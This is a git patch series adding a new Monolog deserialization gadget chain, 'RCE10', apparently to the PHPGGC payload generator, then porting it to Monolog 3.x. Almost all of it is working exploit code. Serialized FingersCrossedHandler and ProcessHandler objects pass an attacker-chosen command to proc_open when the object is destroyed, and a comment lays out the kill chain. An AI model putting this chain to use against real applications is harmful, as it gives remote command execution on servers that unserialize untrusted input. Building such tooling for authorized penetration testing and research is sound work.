From 0df20833e00ecfbb8a749693f71236f78264f372 Mon Sep 17 00:00:00 2001
From: 0xbro <sec.0xbro@gmail.com>
Date: Wed, 11 Mar 2026 12:53:21 +0100
Subject: [PATCH 1/2] Added new Monolog POP chain: Monolog/RCE10

---
 gadgetchains/Monolog/RCE/10/chain.php   | 41 ++++++++++++++++++++
 gadgetchains/Monolog/RCE/10/gadgets.php | 50 +++++++++++++++++++++++++
 2 files changed, 91 insertions(+)
 create mode 100644 gadgetchains/Monolog/RCE/10/chain.php
 create mode 100644 gadgetchains/Monolog/RCE/10/gadgets.php

diff --git a/gadgetchains/Monolog/RCE/10/chain.php b/gadgetchains/Monolog/RCE/10/chain.php
new file mode 100644
index 00000000..dba3f30e
--- /dev/null
+++ b/gadgetchains/Monolog/RCE/10/chain.php
@@ -0,0 +1,41 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+class RCE10 extends \PHPGGC\GadgetChain\RCE\Command
+{
+    public static $version = '1.10.0 <= 2.7.0+';
+    public static $vector = '__destruct';
+    public static $author = '0xbro';
+    public static $information = '
+        This chain is a variation of Monolog/RCE5 and Monolog/RCE6. It uses a proc_open sink inside ProcessHandler, 
+        which executes arbitrary commands serialized within the deserialized object .
+        Kill chain: 
+        FingersCrossedHandler::__destruct()   [Handler base]
+        → close()
+            → flushBuffer()
+                passthruLevel = 500 (non-null) → filter runs
+                buffer[0]["level"] = 500 >= 500 → record passes
+                getHandler() → ProcessHandler (already HandlerInterface) returned directly
+                ProcessHandler::handleBatch([$record])
+                    → AbstractProcessingHandler::handle($record)
+                        isHandling(): 500 >= 100 → true
+                        getFormatter() → null → new LineFormatter()
+                        LineFormatter::format($record)   ← DateTimeImmutable in record["datetime"]
+                        ProcessHandler::write($record)
+                        ensureProcessIsStarted()
+                            is_resource(null) = false → startProcess()
+                            proc_open($command, ...)    ← OS COMMAND EXECUTED
+        ';
+
+    public function generate(array $parameters)
+    {
+        $command = $parameters['command'];
+        
+        return new 
+        \Monolog\Handler\FingersCrossedHandler(
+            new 
+            \Monolog\Handler\ProcessHandler($command)
+        );
+    }
+}
diff --git a/gadgetchains/Monolog/RCE/10/gadgets.php b/gadgetchains/Monolog/RCE/10/gadgets.php
new file mode 100644
index 00000000..8c51d7bb
--- /dev/null
+++ b/gadgetchains/Monolog/RCE/10/gadgets.php
@@ -0,0 +1,50 @@
+<?php
+
+namespace Monolog\Handler 
+{
+    // killchain :  
+    // <abstract>__destruct() => <FingersCrossedHandler>close() => <FingersCrossedHandler>flushBuffer() => <ProcessHandler>handleBatch($records)
+    
+    class FingersCrossedHandler {
+      protected $passthruLevel;
+      protected $buffer = array();
+      protected $handler;
+    
+     public function __construct($handler)
+     {
+         $this->handler = $handler;
+         $this->passthruLevel = 0;
+         $this->buffer = [
+                [
+                    "message" => "x",
+                    "context" => [],
+                    "level" => 500,
+                    "level_name" => "CRITICAL",
+                    "channel" => "app",
+                    "datetime" => new \DateTimeImmutable("2024-01-01 00:00:00.000000", new \DateTimeZone("UTC")),
+                    "extra" => []
+                ]
+            ];
+     }
+    
+    }
+
+    class ProcessHandler
+    {
+        private $command;
+        private $process = null;
+        private $pipes = [];
+        private $cwd = null;
+        protected $level = 100;
+        protected $bubble = true;
+        protected $formatter = null;
+        protected $processors = [];
+        
+
+        function __construct($command)
+        {
+            $this->command = $command;
+        }
+    }
+
+}

From 02687e91bddd5adaa4ef7ca5cb5c9a5e2bebdc86 Mon Sep 17 00:00:00 2001
From: 0xbro <sec.0xbro@gmail.com>
Date: Tue, 17 Mar 2026 19:39:19 +0100
Subject: [PATCH 2/2] Updated gadget chain to Monolog 3.10

---
 gadgetchains/Monolog/RCE/10/chain.php   |  2 +-
 gadgetchains/Monolog/RCE/10/gadgets.php | 90 +++++++++++++++++--------
 2 files changed, 62 insertions(+), 30 deletions(-)

diff --git a/gadgetchains/Monolog/RCE/10/chain.php b/gadgetchains/Monolog/RCE/10/chain.php
index dba3f30e..a4cea56f 100644
--- a/gadgetchains/Monolog/RCE/10/chain.php
+++ b/gadgetchains/Monolog/RCE/10/chain.php
@@ -4,7 +4,7 @@
 
 class RCE10 extends \PHPGGC\GadgetChain\RCE\Command
 {
-    public static $version = '1.10.0 <= 2.7.0+';
+    public static $version = '3.0.0 <= 3.10.0+';
     public static $vector = '__destruct';
     public static $author = '0xbro';
     public static $information = '
diff --git a/gadgetchains/Monolog/RCE/10/gadgets.php b/gadgetchains/Monolog/RCE/10/gadgets.php
index 8c51d7bb..57640793 100644
--- a/gadgetchains/Monolog/RCE/10/gadgets.php
+++ b/gadgetchains/Monolog/RCE/10/gadgets.php
@@ -1,48 +1,80 @@
 <?php
 
+namespace Monolog {
+    enum Level: int {
+        case Debug = 100;
+        case Info = 200;
+        case Notice = 250;
+        case Warning = 300;
+        case Error = 400;
+        case Critical = 500;
+        case Alert = 550;
+        case Emergency = 600;
+    }
+
+    // NEW: Monolog v3 uses a strict LogRecord object instead of arrays
+    class LogRecord {
+        public \DateTimeImmutable $datetime;
+        public string $channel;
+        public Level $level;
+        public string $message;
+        public array $context;
+        public array $extra;
+        public mixed $formatted;
+
+        public function __construct() {
+            $this->datetime = new \DateTimeImmutable("2024-01-01 00:00:00");
+            $this->channel = "app";
+            $this->level = Level::Critical;
+            $this->message = "x";
+            $this->context = [];
+            $this->extra = [];
+            $this->formatted = null;
+        }
+    }
+}
+
 namespace Monolog\Handler 
 {
     // killchain :  
     // <abstract>__destruct() => <FingersCrossedHandler>close() => <FingersCrossedHandler>flushBuffer() => <ProcessHandler>handleBatch($records)
-    
-    class FingersCrossedHandler {
-      protected $passthruLevel;
-      protected $buffer = array();
-      protected $handler;
-    
-     public function __construct($handler)
-     {
-         $this->handler = $handler;
-         $this->passthruLevel = 0;
-         $this->buffer = [
-                [
-                    "message" => "x",
-                    "context" => [],
-                    "level" => 500,
-                    "level_name" => "CRITICAL",
-                    "channel" => "app",
-                    "datetime" => new \DateTimeImmutable("2024-01-01 00:00:00.000000", new \DateTimeZone("UTC")),
-                    "extra" => []
-                ]
+    use Monolog\Level;
+abstract class AbstractHandler {
+        protected $level;
+        protected $bubble = true;
+        
+        public function __construct() {
+            $this->level = Level::Debug;
+        }
+    }
+
+    class FingersCrossedHandler extends AbstractHandler {
+        protected $passthruLevel;
+        protected $buffer = [];
+        protected $handler;
+
+        public function __construct($handler) {
+            parent::__construct();
+            $this->handler = $handler;
+            $this->passthruLevel = Level::Debug;
+            
+            // Populate the buffer with the new LogRecord object
+            $this->buffer = [
+                new \Monolog\LogRecord()
             ];
-     }
-    
+        }
     }
 
-    class ProcessHandler
-    {
+    class ProcessHandler extends AbstractHandler {
         private $command;
         private $process = null;
         private $pipes = [];
         private $cwd = null;
-        protected $level = 100;
-        protected $bubble = true;
         protected $formatter = null;
         protected $processors = [];
-        
 
-        function __construct($command)
-        {
+        function __construct($command) {
+            parent::__construct();
             $this->command = $command;
         }
     }